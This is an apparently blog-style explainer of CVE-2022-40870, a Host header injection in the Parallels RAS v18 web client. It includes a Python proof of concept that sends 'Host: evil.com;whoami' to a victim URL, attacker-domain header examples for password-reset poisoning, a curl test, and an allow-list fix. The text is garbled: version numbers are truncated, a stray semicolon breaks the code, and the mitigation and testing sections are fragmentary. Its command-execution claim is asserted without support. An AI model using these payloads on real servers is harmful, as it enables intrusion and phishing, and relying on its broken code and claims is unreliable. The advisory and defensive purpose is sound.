In late 2022, security researchers discovered a significant vulnerability in the web client of Parallels Remote Application Server (RAS) v18.: a Host Header Injection that allows attackers to execute arbitrary commands by sending a maliciously crafted Host header. Identified as CVE-2022-40870, this weakness opens the door for attacks like web cache poisoning, web application and database manipulation, phishing, and in the worst-case scenario, remote code execution.

In this article, we take a deep dive into how CVE-2022-40870 works, how it can be exploited, and steps admins can take to protect their environments. All info here is exclusive for those who want an in-depth understanding — with working code snippets and practical advice.

The Vulnerability in Simple Terms

Parallels RAS Web Client is a platform allowing remote access to desktops and apps from any device. The web client parses the Host header from HTTP requests to figure out the source domain for certain operations — but in version 18., it fails to properly validate the input.

If an attacker sends a special Host header value in their request, the server uses it for backend logic. This can let attackers inject unexpected input—leading to command execution, phishing, or cache poisoning, depending on how the app further processes the header.

When a user opens the Web Client, their browser sends a request like this

GET / HTTP/1.1
Host: ras.example.com
User-Agent: Mozilla/5.
...

Normally, the Host header is just used to match the intended virtual host.

But in Parallels RAS v18., certain responses and server-side mechanisms may directly include the Host header in redirects, links, or otherwise unsanitized locations. If the header contains untrusted input, this input gets reflected back or processed by backend logic.

Exploiting CVE-2022-40870: Proof-of-Concept

A common exploit is to inject shell commands or malicious links by crafting a request with a tailored Host header. Here’s an example in Python using the requests library:

import requests

# Craft the malicious Host header
headers = {
    'Host': 'evil.com;whoami',
}

# Choose the target (adjust as needed)
url = 'https://ras.victimdomain.com/';

# Launch the exploit request
response = requests.get(url, headers=headers)

print("Response Status:", response.status_code)
print("Response Body:\n", response.text)

Note: Here, if the app uses the Host header in a shell command or passes it to a backend script, the payload ;whoami will be executed. This is a classic example of command injection via unsanitized headers.

Some attackers go further, injecting URLs to redirect users or poison the cache. For example

Host: attacker.com

If the Web Client generates forgot password, login, or activation links based on the Host header, those links will point back to the attacker’s site.

Remote Code Execution: If the input reaches system functions or scripts.

- Phishing: Trick users with activation/reset links pointing to attacker infrastructure.

See if input from Host header shows up in logs, errors, or shell outputs.

4. Review Password Recovery / Email Links:

Example

curl -H "Host: evil.com" https://ras.yourdomain.com

Mitigation and Fixes

Parallels has released updates and advisories regarding this issue. If you’re running RAS v18.:

Example Secure Check

ALLOWED_HOSTS = ['ras.example.com']

def process_request(request):
    host = request.headers.get('Host', '')
    if host not in ALLOWED_HOSTS:
        raise ValueError('Invalid Host header')
    # Continue processing safely...

More Reading & References

- Original CVE Entry: CVE-2022-40870
- NVD Description & Severity
- Parallels Remote Application Server
- OWASP: HTTP Host Header Attacks

Conclusion

CVE-2022-40870 is a stark reminder never to trust user-supplied input—even in headers that seem harmless. Host Header Injection can open up your infrastructure to a range of attacks, from simple phishing to devastating command execution.

Administrators running Parallels RAS v18.: Patch now, audit your code, and always treat external input with suspicion!


*This article is an exclusive, plain-English guide on exploiting and fixing Host Header Injection in Parallels Remote Application Server v18.. Stay safe!*

Timeline

Published on: 11/23/2022 00:15:00 UTC
Last modified on: 11/26/2022 03:33:00 UTC